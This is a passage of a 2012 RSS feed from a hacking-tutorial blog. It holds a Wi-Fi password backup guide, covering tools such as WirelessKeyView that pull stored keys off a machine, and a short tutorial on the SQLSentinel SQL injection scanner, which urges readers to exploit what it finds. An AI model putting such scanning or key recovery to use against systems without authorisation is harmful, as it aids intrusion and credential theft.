&lt;span class="st_twitter_large" displaytext="Tweet"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis"&gt;&lt;/span&gt;  
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-6482011390089327581?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ce5md0AIFzI:5Wt01hRuL9Q:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ce5md0AIFzI:5Wt01hRuL9Q:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ce5md0AIFzI:5Wt01hRuL9Q:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ce5md0AIFzI:5Wt01hRuL9Q:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ce5md0AIFzI:5Wt01hRuL9Q:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/ce5md0AIFzI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/ce5md0AIFzI/metasploit-meterpreter-scripting.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-MHpX5uQyZl8/T7anMmUVPfI/AAAAAAAABLg/szJGk4m1dVo/s72-c/metasploit-logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/metasploit-meterpreter-scripting.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-806734585443005740</guid><pubDate>Thu, 10 May 2012 19:15:00 +0000</pubDate><atom:updated>2012-05-10T12:15:49.701-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">Wireless</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>Backup &amp; Restore Your Wi-Fi Passwords</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/S-BLCmu-Ffd2P2-bZqvL0Xxpcms/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/S-BLCmu-Ffd2P2-bZqvL0Xxpcms/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/S-BLCmu-Ffd2P2-bZqvL0Xxpcms/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/S-BLCmu-Ffd2P2-bZqvL0Xxpcms/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/backup-restore-your-wi-fi-passwords.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-feRwq86SqEE/T6wSbKKXLxI/AAAAAAAABLU/Sg1RmikEn_o/s200/WiFiHD.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;By default all operating systems, including Linux, save passwords of previously connected Wi-Fi access points. There are ways to export these saved passwords to be used in other computers. Third party software like LastPass and WirelessKeyView can save your saved passwords, and import them to other computers. Mac users can use LastPass and 1Password to save their passwords, including Wi-Fi passwords.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: center;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;Windows 7&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;Windows 7 by default saves the password that you enter while connecting to internet through Wi-Fi. Saved passwords can be backed up in a USB drive, but the only drawback is that passwords have to be exported one at a time for each Wi-Fi network. To save a Wi-Fi key/password, click on the &lt;a href="http://www.ehacking.net/search/label/Wireless" style="color: blue;"&gt;wireless&lt;/a&gt; network symbol on the taskbar and click the Open Network and Sharing Center. In the Network Sharing Center window, click on Manage Wireless Network and you will see all your wireless networks listed in the Manage Wireless network window. Double click on the network that you want to export, and you will be taken to the properties page; in the properties page, select the option Copy this network profile to a USB flash drive. Follow the setting wizard instructions and you are good to go. The USB drive will have the setupSNK.exe file and a SMRTNTKY folder.&lt;br /&gt;&lt;br /&gt;Use the USB drive to import the settings to different computers having Windows software (XP, Vista, 7).&lt;br /&gt;To import the settings insert the USB device in your computer and run the setupSNK.exe file. On clicking the setupSNK.exe file, you will be prompted by a message window. Click yes to download the settings on to your computer.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: center;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;LastPass&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;LastPass is utility software that manages passwords, be it for websites or Wi-Fi networks. Best part of LastPass is that it installs on to the browser as an extension. It has a feature to export and import Wi-Fi passwords; this feature is only available in version 1.9 or higher. You may need to run the Universal Installer to download this feature. When encountered with an error simple follow on screen instructions to run the Universal Installer. Passwords are saved into the LastPass Vault, which is sync with your computer.&lt;br /&gt;&lt;br /&gt;Open your web browser and click the LastPass button. Select tools and go to Import From. Then click Wi- Fi Passwords and click Import in the new tab to save the saved Wi-Fi settings from your computer. You can use the check boxes to select networks that you want to import. Log on to LastPass from a different computer and select Export To (below Import From) and then Wi-Fi Passwords to download the settings on to your computer.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: center;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;1Password&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;Similar to LastPass, 1Password is a password manager that saves and generates passwords. It’s available for Windows, Mac, Ipad and Android. Mac users have the option to use either Wi-Fi or Dropbox to sync their data with 1Password manager. Windows users just need to use Dropbox to sync all their data.&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Ipad users can use the option Backup &amp;amp; Restore to backup their data. To do so, open 1Password and select Settings&amp;gt; Data&amp;gt; Backup &amp;amp; Restore. Remember that both your computer and IOS should be on the same Wi-Fi network to perform this process. Apple doesn’t allow third party apps to sync via USB drive.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue; font-family: inherit; font-size: large;"&gt;WirelessKeyView&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;This software recovers all the stored wireless network keys/passwords in your computer. You can save the information in text/html/xml file. Best thing about this software is that it’s a freeware, unlike LastPass and 1Password. Be sure to download the latest version to get all the options. This software only works on Windows machine, starting from Windows XP.&lt;br /&gt;&lt;br /&gt;Download the software from Nirsoft’s website and double click the .exe file. On start up, the program will show all saved wireless passwords in a list form. You can save the network that you want to export in to a text file by selecting Save Selected Items from file menu.&lt;br /&gt;&lt;br /&gt;All above software products provide a myriad of features; however, WirelessKeyView only provides basic features like converting information regarding wireless network settings into text files. LastPass is the most versatile in respect to platform, because any operating system that can run Mozilla Firefox web browser can use LastPass; the software just installs an extension for the browser and supports Internet Explorer, Chrome and Firefox. Windows 7 user can rejoice as it has the option to export wireless network information on USB drive, and they don’t need to download anything extra for exporting Wi-Fi&lt;br /&gt;passwords.&lt;br /&gt;&lt;br /&gt;About the author: Margaret is a blogger by profession. She loves writing on environment and automotto. Beside this she is fond of books. She recently did an article on &lt;a href="http://www.ecofriend.com/concrete-thermal-mass-walls-help-reduce-energy-consumption.html" style="color: blue;" target="_blank"&gt;Concrete Walls&lt;/a&gt;. These days&lt;br /&gt;she is busy in writing an article on &lt;a href="http://www.automotto.com/" style="color: blue;" target="_blank"&gt;autos india&lt;/a&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-806734585443005740?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Q38fdKImQLE:8eNl__AgpGc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Q38fdKImQLE:8eNl__AgpGc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Q38fdKImQLE:8eNl__AgpGc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Q38fdKImQLE:8eNl__AgpGc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Q38fdKImQLE:8eNl__AgpGc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/Q38fdKImQLE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/Q38fdKImQLE/backup-restore-your-wi-fi-passwords.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-feRwq86SqEE/T6wSbKKXLxI/AAAAAAAABLU/Sg1RmikEn_o/s72-c/WiFiHD.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/backup-restore-your-wi-fi-passwords.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1155040720897680598</guid><pubDate>Mon, 07 May 2012 15:24:00 +0000</pubDate><atom:updated>2012-05-07T08:25:09.282-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Web Security</category><category domain="http://www.blogger.com/atom/ns#">Open Source</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">SQL</category><title>SQLSentinel - SQL Injection Vulnerability Scanner</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4cvOL8q4W0pKgEu8pzKcUKWOA50/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4cvOL8q4W0pKgEu8pzKcUKWOA50/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4cvOL8q4W0pKgEu8pzKcUKWOA50/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4cvOL8q4W0pKgEu8pzKcUKWOA50/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/sqlsentinel-sql-injection-vulnerability.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-M36P0fbjRag/T6fosUyBVOI/AAAAAAAABLI/hNmdHy5WetM/s200/logo_sql.gif" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;SQL injection is the most dangerous and common web application attack, there are so many tools are available to exploit the &lt;a href="http://www.ehacking.net/search/label/SQL" style="color: blue;" target="_blank"&gt;SQL-injection&lt;/a&gt; vulnerability like Havij and SQLmap but to find a vulnerability is an important step to exploit the web application. So in this article we will discuss about a wonderful tool that can find the SQL-injection vulnerability on a web application.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;SQLSentinel is an opensource tool  that automates the process of finding
 the sql injection on a website. SQLSentinel includes a spider web and 
sql errors finder. You give in input a site and SQLSentinel crawls and 
try to exploit parameters validation error for you. When job is 
finished, it can generate a pdf report which contains the url vuln found
 and the url crawled.  &lt;br /&gt;&lt;br /&gt;
Please remember that SQLSentinel is not an exploiting tool. It can only finds url Vulnerabilities.&lt;/b&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Find the SQL-injection &lt;a href="http://www.ehacking.net/search/label/Vulnerability" style="color: blue;" target="_blank"&gt;vulnerability&lt;/a&gt; and then exploit the vulnerability by using the famous SQL-injection tool, SQLSentinel is a very easy tool to use.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="font-family: inherit; text-align: left;"&gt;



&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;h2 style="font-family: inherit; text-align: center;"&gt;



&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;b style="color: blue;"&gt;SQLSentinel Tutorial&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Go and download the tool &lt;a href="http://sourceforge.net/projects/sqlsentinel/files/" rel="nofollow" target="_blank"&gt;here&lt;/a&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Extract it on your directory.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;In my case I am on backtrack 5 based on Ubuntu.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Simply open the terminal and then locate the directory where you have extracted the tool before.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;It is a Java dependent so use the command as:&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;root@bt:~/Desktop# java -jar sqlsentinel.jar&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-weJzuI0jefQ/T6fnqB3B_LI/AAAAAAAABLA/nswdHNBd3hs/s1600/SQLSentinel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="347" src="http://2.bp.blogspot.com/-weJzuI0jefQ/T6fnqB3B_LI/AAAAAAAABLA/nswdHNBd3hs/s640/SQLSentinel.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Do not forget to share this wonderful tool around your circle.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="st_twitter_large" displaytext="Tweet"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis"&gt;&lt;/span&gt;  
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1155040720897680598?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=bEiZBLKa-4c:tkYkSV9CycU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=bEiZBLKa-4c:tkYkSV9CycU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=bEiZBLKa-4c:tkYkSV9CycU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=bEiZBLKa-4c:tkYkSV9CycU:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=bEiZBLKa-4c:tkYkSV9CycU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/bEiZBLKa-4c" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/bEiZBLKa-4c/sqlsentinel-sql-injection-vulnerability.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-M36P0fbjRag/T6fosUyBVOI/AAAAAAAABLI/hNmdHy5WetM/s72-c/logo_sql.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/sqlsentinel-sql-injection-vulnerability.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-4354591904522074358</guid><pubDate>Sat, 05 May 2012 16:45:00 +0000</pubDate><atom:updated>2012-05-05T09:45:57.862-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category 